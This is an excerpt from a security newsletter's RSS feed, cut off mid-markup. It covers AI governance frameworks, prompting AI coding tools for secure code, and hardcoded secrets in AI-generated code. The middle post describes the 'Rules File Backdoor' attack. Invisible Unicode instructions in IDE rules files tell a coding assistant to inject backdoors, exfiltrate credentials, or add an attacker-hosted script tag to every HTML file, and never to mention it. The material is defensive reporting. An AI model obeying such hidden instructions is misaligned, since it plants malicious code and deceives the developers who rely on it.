standard.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192628488?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard." title="Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard." srcset="https://substackcdn.com/image/fetch/$s_!5WA3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 424w, https://substackcdn.com/image/fetch/$s_!5WA3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 848w, https://substackcdn.com/image/fetch/$s_!5WA3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 1272w, https://substackcdn.com/image/fetch/$s_!5WA3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Where AI Governance Programs Break in Practice</h2><p>Writing a governance framework and operating one are different disciplines. The gap between them is where enforcement exposure lives.</p><p><strong>The AI inventory problem.</strong> You can&#8217;t classify risk, assign oversight, or enforce logging on systems you haven&#8217;t catalogued. <a href="https://www.toxsec.com/p/shadow-ai-is-the-new-shadow-it">Shadow AI</a>, tools employees run outside approved channels and outside any governance register, is a persistent reality in every enterprise. If the inventory is fiction, every control built on top of it is fiction too. And shadow AI is harder to catch than shadow IT ever was because the tools <a href="https://www.toxsec.com/p/the-voluntary-exfiltration-program">live in browser tabs on personal devices</a> and look exactly like normal web browsing.</p><p><strong>The accountability gap.</strong> EU AI Act requires &#8220;sufficient scientific personnel&#8221; with documented oversight responsibilities. NIST AI RMF GOVERN 6.1 requires explicit accountability lines for AI decisions. In practice, governance gets assigned to compliance teams who don&#8217;t know what a model card is and security teams who don&#8217;t have a policy mandate. Security thinks compliance owns model monitoring. Compliance thinks security owns it. Nobody gets an alert when inference goes sideways.</p><p><strong>The audit trail gap.</strong> Governance frameworks promise logging of AI interactions, versioned model documentation, and traceable decision records. The policy exists. The actual pipeline from AI inference to your SIEM often doesn&#8217;t. Regulators don&#8217;t fine you for having a policy. They fine you when you can&#8217;t prove the controls ran. Same lesson we keep learning from <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">vibe-coded applications shipping credentials in plaintext</a>: if the check doesn&#8217;t run in production, it doesn&#8217;t count.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What does the EU AI Act require for high-risk AI systems?</h3><p>High-risk AI systems under the EU AI Act must complete conformity assessments before deployment, maintain technical documentation covering model design and validation, implement human oversight mechanisms capable of real-time intervention, and establish comprehensive logging. Penalties reach &#8364;35 million or 7% of global annual turnover. The law applies to any organization deploying or selling AI in the EU, regardless of headquarters location. Full enforcement begins August 2, 2026.</p><h3>What is the NIST AI Risk Management Framework?</h3><p>The NIST AI RMF is a structured framework organizing AI risk management across four functions: Govern, Map, Measure, and Manage. The GOVERN function requires documented ownership structures, risk tolerance thresholds, and explicit accountability for AI decisions. The 2024 Generative AI Profile extends coverage to LLMs and agentic systems. NIST AI RMF carries no independent legal penalties but increasingly gates federal contract eligibility and enterprise procurement decisions.</p><h3>What should an AI governance program include at minimum?</h3><p>A functioning AI governance program needs a complete inventory of all AI systems in the environment, risk classifications mapped to regulatory tiers, documented ownership with explicit decision accountability, audit logging connected to production systems rather than just described in policy, and a review cycle that keeps classifications current as deployments change. The policy is the starting point. The working implementation is the actual compliance requirement.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[AI Coding Tools Default to Insecure Patterns: The 5-Minute Rules File Fix]]></title><description><![CDATA[Security-focused prompts and rules files measurably reduce AI-generated vulnerabilities in Copilot, Cursor, and Claude Code.]]></description><link>https://www.toxsec.com/p/prompt-ai-to-write-secure-code</link><guid isPermaLink="false">https://www.toxsec.com/p/prompt-ai-to-write-secure-code</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Tue, 07 Apr 2026 13:31:02 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!2P3G!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2P3G!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2P3G!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!2P3G!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!2P3G!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!2P3G!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2P3G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:8491092,&quot;alt&quot;:&quot;AI secure coding prompt engineering showing security rules files for Cursor, GitHub Copilot, and Claude Code with parameterized queries, CWE prevention, and RAILGUARD framework for safe AI-generated code.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193014518?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F413910e5-6bc0-47ee-8290-f3753c6da22c_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="AI secure coding prompt engineering showing security rules files for Cursor, GitHub Copilot, and Claude Code with parameterized queries, CWE prevention, and RAILGUARD framework for safe AI-generated code." title="AI secure coding prompt engineering showing security rules files for Cursor, GitHub Copilot, and Claude Code with parameterized queries, CWE prevention, and RAILGUARD framework for safe AI-generated code." srcset="https://substackcdn.com/image/fetch/$s_!2P3G!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!2P3G!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!2P3G!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!2P3G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8802635f-9427-44d1-959a-cfe0b54e5b1d_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong>AI coding tools default to insecure patterns because their training data is full of them. Better prompts measurably reduce the damage. Security rules files make those prompts persistent. But the rules files themselves are now an attack surface. Setup takes five minutes. Poisoning one takes less.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why &#8220;Write Secure Code&#8221; Fails as a Prompt</h2><p>Every AI coding tool on the market learned from the same pool: public GitHub repos, Stack Overflow answers, tutorial code that skips authentication because the tutorial was about something else. The model absorbed insecure patterns alongside secure ones, and the insecure ones showed up more often. So when you ask for a login system, you get the pattern the model saw the most. That pattern frequently ships without session handling, without authorization checks, without input validation.</p><p>Telling the AI &#8220;make it secure&#8221; barely moves the needle. A <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">controlled experiment</a> tested this directly: same model, same prompts, same to-do app. The only variable was whether a security-focused system prompt was loaded before development started. Without it, the AI built a full login flow with registration, a form, a success response, the works. But it never created a session. Every API endpoint was wide open. It also shipped a stored XSS vulnerability through a filename passed into an <code>onclick</code> handler. With the security prompt loaded, those entire categories of bugs disappeared from the output.</p><blockquote><p><strong>The prompt is a security control. Treat it like one.</strong></p></blockquote><h2>What Happens When Prompts Carry Zero Security Context</h2><p>The gap between &#8220;write me a Flask API&#8221; and &#8220;write me a Flask API with parameterized queries, role-based auth, and input validation capped at 100 characters&#8221; is the gap between shipping a vulnerability and not shipping one. The first prompt gives the model zero constraints. It defaults to whatever its training data used most often, and the most common pattern is the insecure one.</p><p>We can get specific about what &#8220;insecure default&#8221; means. The model will build SQL queries with string concatenation instead of parameterized statements (CWE-89). It will reflect user input into HTML without sanitization (CWE-79). It will <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">hardcode API keys directly in source files</a> (CWE-798). It will hash passwords with MD5 or skip hashing entirely (CWE-328). These patterns dominate the training data because they dominate public code. The same training data bias that <a href="https://www.toxsec.com/p/distillation-raids-slopsquatting">produces hallucinated package names</a> also produces insecure code patterns.</p><p>And here&#8217;s where it gets worse. The OpenSSF tested a pattern that security practitioners would assume works: telling the AI to &#8220;act as a security expert.&#8221; Persona prompting improves output in most domains. In security, it doesn&#8217;t produce consistent improvement. The model performs better when you name the exact controls, the exact CWEs to avoid, and the exact functions to ban. Persona framing gives the model a vibe. Constraints give it guardrails. One of those is measurable. The other is wishful thinking.</p><h2>Your Security Rules File Is Now an Attack Surface</h2><p>Every major AI coding tool supports persistent instruction files. Cursor reads <code>.cursor/rules/</code>. Claude Code reads <code>CLAUDE.md</code>. GitHub Copilot reads <code>.github/copilot-instructions.md</code>. The idea is sound: write your security requirements once, and every code generation request passes through them automatically. Five minutes of setup. Every session inherits the same guardrails.</p><p>The problem is that these files live in your repo. They get committed. They get shared. They get forked. And in March 2025, Pillar Security demonstrated exactly what that means.</p><p>The attack is called Rules File Backdoor. An attacker embeds hidden instructions into a rules file using invisible Unicode characters: zero-width joiners, bidirectional text markers, characters that render as blank space in every editor but parse as valid instructions by the AI. The poisoned file tells the model to inject backdoors, disable security checks, or exfiltrate credentials in every piece of code it generates. This is the same class of <a href="https://www.toxsec.com/p/lets-poison-the-mcp">tool description poisoning we demonstrated against MCP servers</a>, just aimed at the IDE instead of the agent. The developer opens the repo. The AI reads the rules. Every suggestion from that point forward is compromised. And the developer never sees it because the instructions are literally invisible.</p><p>Pillar disclosed to both Cursor and GitHub. Both responded that users are responsible for reviewing AI-generated suggestions. Cursor maintained the position even after Pillar demonstrated the full chain. The attack survives project forking, meaning a single poisoned rules file in a popular starter template propagates to every downstream project. The very mechanism designed to make AI code more secure is now the vector for making it less secure, and the vendors who built these tools say it&#8217;s your problem.</p><p>The researchers showed it live: a rules file that looks clean in your editor, looks clean in a GitHub pull request diff, and silently instructs the AI to add a malicious script tag sourced from an attacker-controlled domain to every HTML file it generates. The file explicitly tells the AI not to mention the addition. The code passes review because the reviewer trusts the AI, and the AI is following orders from a file nobody can read. The same <a href="https://www.toxsec.com/p/fck-your-guardrails">instruction-data conflation</a> that makes models vulnerable to prompt injection makes them obey poisoned rules files without question.</p><blockquote><p>We dropped the free chapters. Now breach the wall for the dead-simple step-by-step kill switch that shuts this all down. </p><p><strong>My security rules file included.</strong></p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/prompt-ai-to-write-secure-code">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Hardcoded Secrets in AI-Generated Code: Catch Them Before Git Does]]></title><description><![CDATA[AI-generated code hardcodes API keys, tokens, and passwords by default. Here&#8217;s why, what to grep for, and the two free tools that kill it.]]></description><link>https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets</link><guid isPermaLink="false">https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Fri, 03 Apr 2026 13:31:41 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!1n8E!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1n8E!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1n8E!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!1n8E!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!1n8E!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!1n8E!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1n8E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/24366994-572c-48de-b42b-09725197eec1_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:8470546,&quot;alt&quot;:&quot;Hardcoded secrets in AI-generated code detected by Gitleaks and TruffleHog showing API keys passwords and credentials leaked by LLM coding tools into git repositories&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193004818?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4507085-17ec-4121-b13b-b488b9d22917_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Hardcoded secrets in AI-generated code detected by Gitleaks and TruffleHog showing API keys passwords and credentials leaked by LLM coding tools into git repositories" title="Hardcoded secrets in AI-generated code detected by Gitleaks and TruffleHog showing API keys passwords and credentials leaked by LLM coding tools into git repositories" srcset="https://substackcdn.com/image/fetch/$s_!1n8E!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!1n8E!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!1n8E!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!1n8E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24366994-572c-48de-b42b-09725197eec1_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> AI coding tools hardcode credentials because that&#8217;s what &#8220;working code&#8221; looked like in their training data. Every model has its own favorite placeholder secrets, and they ship to production if nobody checks. Gitleaks catches them at commit time. TruffleHog verifies which ones are still live. Both are free. Set them up in ten minutes.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>How Do Hardcoded Secrets End Up in AI-Generated Code?</h2><p>You describe a feature. The AI writes it. Somewhere in that output is a database password sitting in plaintext, an API key dropped directly into a config file, or a JWT signing secret that every app the model has ever generated shares. The code runs. The feature works. The secret is now in your repo, your git history, and possibly your client-side JavaScript bundle where anyone with a browser can read it.</p><p>This is <a href="https://cwe.mitre.org/data/definitions/798.html">CWE-798</a>: use of hardcoded credentials, one of the oldest entries in the weakness catalog. AI didn&#8217;t invent this problem. AI industrialized it. LLMs learned to code from millions of public repositories where developers hardcoded secrets constantly. The model reproduces the pattern because the pattern is what &#8220;working code&#8221; looked like in training. When you ask it to connect to Stripe or spin up a Postgres pool, the fastest path to functional output is dropping the credential inline. The model optimizes for code that runs, and hardcoded secrets run on the first try. This is one leg of a <a href="https://www.toxsec.com/p/is-vibe-coding-safe-3-security-checks">three-part attack surface</a> that includes supply chain poisoning and prompt injection, all shipping in the same afternoon.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XUxb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XUxb!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 424w, https://substackcdn.com/image/fetch/$s_!XUxb!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 848w, https://substackcdn.com/image/fetch/$s_!XUxb!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 1272w, https://substackcdn.com/image/fetch/$s_!XUxb!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XUxb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png" width="577" height="528.5939597315436" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ad88df92-9c39-4422-9f37-104b4b764007_894x819.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:819,&quot;width&quot;:894,&quot;resizeWidth&quot;:577,&quot;bytes&quot;:56988,&quot;alt&quot;:&quot;toxsec.com hard coded credentials&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193004818?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com hard coded credentials" title="toxsec.com hard coded credentials" srcset="https://substackcdn.com/image/fetch/$s_!XUxb!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 424w, https://substackcdn.com/image/fetch/$s_!XUxb!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 848w, https://substackcdn.com/image/fetch/$s_!XUxb!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad88df92-9c39-4422-9f37-104b4b764007_894x819.png 1272w, 